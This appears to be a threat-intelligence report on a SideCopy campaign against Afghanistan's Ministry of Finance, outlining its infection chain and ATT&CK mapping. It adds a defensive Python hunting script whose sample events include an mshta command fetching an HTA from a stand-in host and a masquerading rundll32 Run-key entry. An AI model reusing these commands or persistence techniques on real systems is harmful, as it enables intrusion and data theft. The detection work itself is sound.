EXECUTIVE SUMMARY
The campaign, attributed to the SideCopy group operating under the Transparent Tribe/APT36 umbrella, targets Afghanistan's Ministry of Finance and its provincial revenue directorates. The actors employ a spear-phishing attachment that disguises a malicious shortcut (LNK) file as a PDF document with a Pashto-language filename, reflecting knowledge of the local language and workflow. Their primary objective is the covert collection of financial records, personnel details, and communications that can be leveraged for intelligence or future extortion. By focusing on a government finance network, the operation seeks to compromise a critical pillar of the country's economic administration. The infection chain begins with a ZIP archive delivered to targeted officials.
Inside the archive is a shortcut file that launches mshta.exe, which fetches an HTA payload from a compromised Afghan education domain. The HTA runs obfuscated JavaScript that reconstructs a loader DLL entirely in memory, so the loader never touches disk. The loader then creates a Registry Run key disguised as a legitimate Microsoft Edge entry, giving it persistence across reboots. Finally, the loader drops XenoRAT, which beacons to a bulletproof-hosted server in Europe, providing command-and-control, lateral movement, and exfiltration of harvested finance data. Every stage relies on legitimate Windows binaries, which helps the chain evade signature-based detection.
The threat poses a serious risk to any organization handling sensitive financial information because the malware runs largely in memory and blends its traffic with that of legitimate web services. Its use of native utilities, encrypted beaconing, and a stealthy persistence mechanism makes detection difficult and recovery time-consuming. Defenders should harden email gateways, enforce attachment scanning (including archives that contain .lnk files), and block or alert on mshta.exe when it is launched from user-facing applications or passed a remote URL. Regular audits of Registry Run entries, network monitoring for anomalous outbound connections, and a robust backup strategy add further layers of protection. Endpoint detection with behavioral analytics further reduces the chance of a successful compromise.
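As an added illustration (not part of the original report or the vendor's detection content), the following Python script applies two of the checks recommended above to constructed, Sysmon-style process-creation and Run-key events: it flags mshta.exe when it is passed a remote URL or launched from a user-facing parent such as explorer.exe, and it flags a Run-key value whose name imitates Microsoft Edge but whose command does not point at an Edge install directory or invokes a proxy-execution binary. The event records, URL and file paths are made up for the demonstration.

```python
"""Hunt for the mshta-to-Run-key chain in constructed endpoint events."""
import re

# Constructed sample events (hypothetical, not real telemetry), shaped after
# Sysmon process-create (EventID 1) and registry value-set (EventID 13) records.
SAMPLE_EVENTS = [
    {"event": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     # hypothetical URL standing in for the compromised education domain
     "cmdline": 'mshta.exe "http://compromised-edu.example/files/notice.hta"'},
    {"event": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Vendor\installer.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"event": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "MicrosoftEdgeUpdate",
     "value": r"rundll32.exe C:\Users\user\AppData\Roaming\edge\loader.dll,Start"},
    {"event": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "MicrosoftEdgeAutoLaunch_ABC",
     "value": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Parents that indicate a user opened something rather than a service or installer.
USER_LAUNCHERS = {"explorer.exe", "outlook.exe", "winword.exe", "excel.exe",
                  "chrome.exe", "msedge.exe", "firefox.exe"}
EDGE_INSTALL_DIRS = (
    r"c:\program files (x86)\microsoft\edge\application",
    r"c:\program files\microsoft\edge\application",
)
RUN_KEY_SUFFIX = r"\microsoft\windows\currentversion\run"
PROXY_EXEC_HOSTS = ("rundll32", "regsvr32", "mshta", "wscript", "cscript", "powershell")


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Return a rule name if an mshta.exe launch looks like the phishing chain."""
    if basename(ev["image"]) != "mshta.exe":
        return None
    if REMOTE_URL.search(ev.get("cmdline", "")):
        return "mshta_remote_hta"          # HTA pulled straight from the web
    if basename(ev.get("parent", "")) in USER_LAUNCHERS:
        return "mshta_user_launched"       # e.g. LNK opened from Explorer
    return None


def check_registry(ev):
    """Return a rule name if a Run-key value masquerades as Microsoft Edge."""
    if not ev["key"].lower().endswith(RUN_KEY_SUFFIX):
        return None
    name, value = ev["name"].lower(), ev["value"].lower()
    if "edge" not in name:
        return None
    in_edge_dir = any(d in value for d in EDGE_INSTALL_DIRS)
    uses_proxy_host = any(h in value for h in PROXY_EXEC_HOSTS)
    if in_edge_dir and not uses_proxy_host:
        return None                        # real Edge autostart entry
    return "run_key_edge_masquerade"


def hunt(events):
    """Run both checks over a list of events; return (rule, event) hits."""
    findings = []
    for ev in events:
        rule = check_process(ev) if ev["event"] == "process" else check_registry(ev)
        if rule:
            findings.append((rule, ev))
    return findings


if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {ev}")
```

Only the remote-URL mshta launch and the rundll32-backed "MicrosoftEdgeUpdate" entry are reported; the installer-spawned local HTA and the genuine Edge autostart value pass, which is the false-positive behaviour a production rule should preserve.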
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | — |
| Privilege Escalation | T1055 | Process Injection | — |
| Defense Evasion | T1564.001 | Hide Artifacts | Hidden Files and Directories |
| Discovery | T1012 | Query Registry | — |
| Discovery | T1082 | System Information Discovery | — |
| Discovery | T1518.001 | Software Discovery | Security Software Discovery |
| Collection | T1113 | Screen Capture | — |
REFERENCES:
The following reports contain further technical details:
https://www.seqrite.com/blog/operation-xenofiscal-sidecopy-deploying-persistent-xenorat-targeting-the-mof-afghanistan/
https://therecord.media/afghan-officials-targeted-by-sidecopy